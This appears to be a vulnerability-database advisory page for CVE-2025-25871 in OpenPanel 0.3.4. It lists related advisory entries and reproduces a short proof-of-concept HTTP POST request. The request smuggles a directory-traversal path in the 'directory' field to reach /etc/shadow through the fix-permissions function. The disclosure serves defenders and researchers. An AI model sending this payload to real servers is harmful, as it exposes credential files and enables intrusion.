OpenPanel 0.3.4 Directory Traversal / Arbitrary File Read

🗓️ 07 Mar 2025 00:00:00Reported by Korn Chaisuwan, Pongtorn Angsuchotmetee, Punthat SiriwanType

packetstorm🔗 packetstorm.news👁 296 Views

OpenPanel 0.3.4 has a directory traversal vulnerability allowing arbitrary file reads.

Reporter	Title	Published	Views	Family All 9
Circl	CVE-2025-25871	14 Mar 202516:46	–	circl
CNNVD	OpenPanel 安全漏洞	8 Mar 202500:00	–	cnnvd
CNVD	Open Panel Elevation of Privilege Vulnerability	21 Mar 202500:00	–	cnvd
CVE	CVE-2025-25871	14 Mar 202500:00	–	cve
Cvelist	CVE-2025-25871	14 Mar 202500:00	–	cvelist
EUVD	EUVD-2025-6449	3 Oct 202520:07	–	euvd
NVD	CVE-2025-25871	14 Mar 202516:15	–	nvd
RedhatCVE	CVE-2025-25871	16 Mar 202500:22	–	redhatcve
Vulnrichment	CVE-2025-25871	14 Mar 202500:00	–	vulnrichment

# Exploit Title: OpenPanel 0.3.4 - Insecure Permission Modification via Fix Permission Function
    # Date: Nov 7, 2024
    # Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2025-25871
    
    POST /fix-permissions HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFuA.wDaUg0WYvBXvCQkEpxPwgcMeSpc
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/fix-permissions
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 102
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    
    directory=%2Fhome%2Fstefan%2Fetc%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow

07 Mar 2025 00:00Current

7.2High risk

Vulners AI Score7.2

EPSS0.00291